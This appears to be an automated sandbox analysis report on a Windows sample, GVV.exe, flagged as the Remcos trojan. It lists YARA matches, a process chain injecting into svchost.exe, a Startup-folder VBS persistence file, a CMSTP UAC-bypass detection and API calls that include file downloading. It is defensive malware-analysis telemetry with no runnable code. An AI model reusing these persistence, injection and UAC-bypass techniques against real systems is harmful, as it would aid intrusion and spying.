          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@12/21@2/2
          Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_001837B5 GetLastError,FormatMessageW
          Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_001710BF AdjustTokenPrivileges,CloseHandle
          Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_001716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Code function: 4_2_004D10BF AdjustTokenPrivileges,CloseHandle
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Code function: 4_2_004D16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 15_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
          Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_001851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
          Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_0019A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
          Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_0018648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
          Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_001142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
          Source: C:\Users\user\Desktop\GVV.exe File created: C:\Users\user\AppData\Local\silvexes
          Source: C:\Windows\SysWOW64\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS
          Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2248
          Source: C:\Users\user\Desktop\GVV.exe File created: C:\Users\user\AppData\Local\Temp\autEA6E.tmp
          Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
          Source: GVV.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\GVV.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: GVV.exe ReversingLabs: Detection: 34%
          Source: GVV.exe Virustotal: Detection: 30%
          Source: C:\Users\user\Desktop\GVV.exe File read: C:\Users\user\Desktop\GVV.exe
          Source: unknown Process created: C:\Users\user\Desktop\GVV.exe "C:\Users\user\Desktop\GVV.exe"
          Source: C:\Users\user\Desktop\GVV.exe Process created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\Desktop\GVV.exe"
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\GVV.exe"
          Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456
          Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
          Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: GVV.exe Static file information: File size 1369600 > 1048576
Source: GVV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: GVV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: GVV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: GVV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: GVV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: GVV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: GVV.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: deblaterate.exe, 00000004.00000003.3898366158.0000000004080000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000004.00000003.3899574289.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090794343.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090920918.00000000040B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: deblaterate.exe, 00000004.00000003.3898366158.0000000004080000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000004.00000003.3899574289.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090794343.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 0000000E.00000003.4090920918.00000000040B0000.00000004.00001000.00020000.00000000.sdmp
Source: GVV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: GVV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: GVV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: GVV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: GVV.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_001142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001142DE
Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_00130A76 push ecx; ret 0_2_00130A89
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Code function: 4_2_00490A76 push ecx; ret 4_2_00490A89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00457106 push ecx; ret 5_2_00457119
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0045B11A push esp; ret 5_2_0045B141
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0045E54D push esi; ret 5_2_0045E556
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00457A28 push eax; ret 5_2_00457A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00434E56 push ecx; ret 5_2_00434E69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 15_2_00457106 push ecx; ret 15_2_00457119
Source: C:\Windows\SysWOW64\svchost.exe Code function: 15_2_0045B11A push esp; ret 15_2_0045B141
Source: C:\Windows\SysWOW64\svchost.exe Code function: 15_2_0045E54D push esi; ret 15_2_0045E556
Source: C:\Windows\SysWOW64\svchost.exe Code function: 15_2_00457A28 push eax; ret 15_2_00457A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 15_2_00434E56 push ecx; ret 15_2_00434E69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_00406EB0 ShellExecuteW,URLDownloadToFileW,5_2_00406EB0
Source: C:\Users\user\Desktop\GVV.exe File created: C:\Users\user\AppData\Local\silvexes\deblaterate.exe

          Boot Survival

Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_0041AA4A
Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_0012F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0012F98E
Source: C:\Users\user\Desktop\GVV.exe Code function: 0_2_001A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_001A1C41
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Code function: 4_2_0048F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_0048F98E
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Code function: 4_2_00501C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_00501C41
Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041CB50
Source: C:\Users\user\Desktop\GVV.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
